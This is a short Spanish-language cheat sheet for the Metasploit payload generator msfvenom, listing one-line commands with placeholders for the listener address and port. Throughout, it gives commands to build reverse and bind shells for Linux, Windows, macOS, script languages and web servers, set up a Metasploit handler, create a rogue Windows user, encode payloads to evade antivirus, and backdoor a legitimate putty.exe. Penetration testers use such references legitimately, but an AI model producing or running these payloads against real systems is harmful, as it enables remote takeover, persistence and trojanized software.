\   /\          __    _____        _____     _____ _ _____
)  ( ')        |  |  |  _  |   ___|  _  |___|  |  |_|_   _|___
(  /  )        |  |__|     |  |  _|     |_ -|     | | | | | .'| 
 \(__)|        |_____|__|__|  |___|__|__|___|__|__|_| |_| |__,|

 
 
Aqui teneis una cheatsheet para msfvenom.

Listar payloads
---------------

msfvenom -l
Handlers --------
use exploit/multi/handler
set PAYLOAD 
set LHOST 
set LPORT 
set ExitOnSession false
exploit -j -z
Binarios -------- Linux Payloads. --------------- Reverse Shell.
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP_LOCAL LPORT=PUERTO_LOCAL -f elf >reverse.elf
Bind Shell.
msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=IP_LOCAL LPORT=PUERTO_LOCAL -f elf > bind.elf
Shell Generica.
msfvenom -p generic/shell_bind_tcp RHOST=IP_LOCAL LPORT=PUERTO_LOCAL -f elf > generica.elf
Windows Paylaods ---------------- Reverse Shell.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP_LOCAL LPORT=PUERTO_LOCAL -f exe > reverse.exe
Bind Shell.
msfvenom -p windows/meterpreter/bind_tcp RHOST=IP_LOCAL LPORT=PUERTO_LOCAL -f exe > bind.exe
Crear Usuario.
msfvenom -p windows/adduser USER=attacker PASS=attacker@123 -f exe > usuario.exe
CMD shell.
msfvenom -p windows/shell/reverse_tcp LHOST=IP_LOCAL LPORT=PUERTO_LOCAL -f exe > cmdvenom.exe
Encoder.
msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 3 -f exe > encodeada.exe
Backdoor.
msfvenom -a x86 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost=IP_LOCAL LPORT=PUERTO_LOCAL -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o putty_backdoor.exe
MAC Paylaods ------------ Reverse Shell.
msfvenom -p osx/x86/shell_reverse_tcp LHOST=IP_LOCAL LPORT=PUERTO_LOCAL -f macho > reverseshell.macho
Bind Shell.
msfvenom -p osx/x86/shell_bind_tcp RHOST=IP_LOCAL LPORT=PUERTO_LOCAL -f macho > bindshell.macho
Script Langauge payloads ------------------------ Perl
msfvenom -p cmd/unix/reverse_perl LHOST=IP_LOCAL LPORT=PUERTO_LOCAL -f raw > reverseperl.pl
Python
msfvenom -p cmd/unix/reverse_python LHOST=IP_LOCAL LPORT=PUERTO_LOCAL -f raw > reversepython.py
Bash
msfvenom -p cmd/unix/reverse_bash LHOST=IP_LOCAL LPORT=PUERTO_LOCAL -f raw > reversebash.sh
Web Payloads ------------ PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=IP_LOCAL LPORT=PUERTO_LOCAL -f raw > meterpreterphp.php
cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP_LOCAL LPORT=PUERTO_LOCAL -f asp > reverseasp.asp
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=IP_LOCAL LPORT=PUERTO_LOCAL -f raw > reversejsp.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=IP_LOCAL LPORT=PUERTO_LOCAL -f war > reversewar.war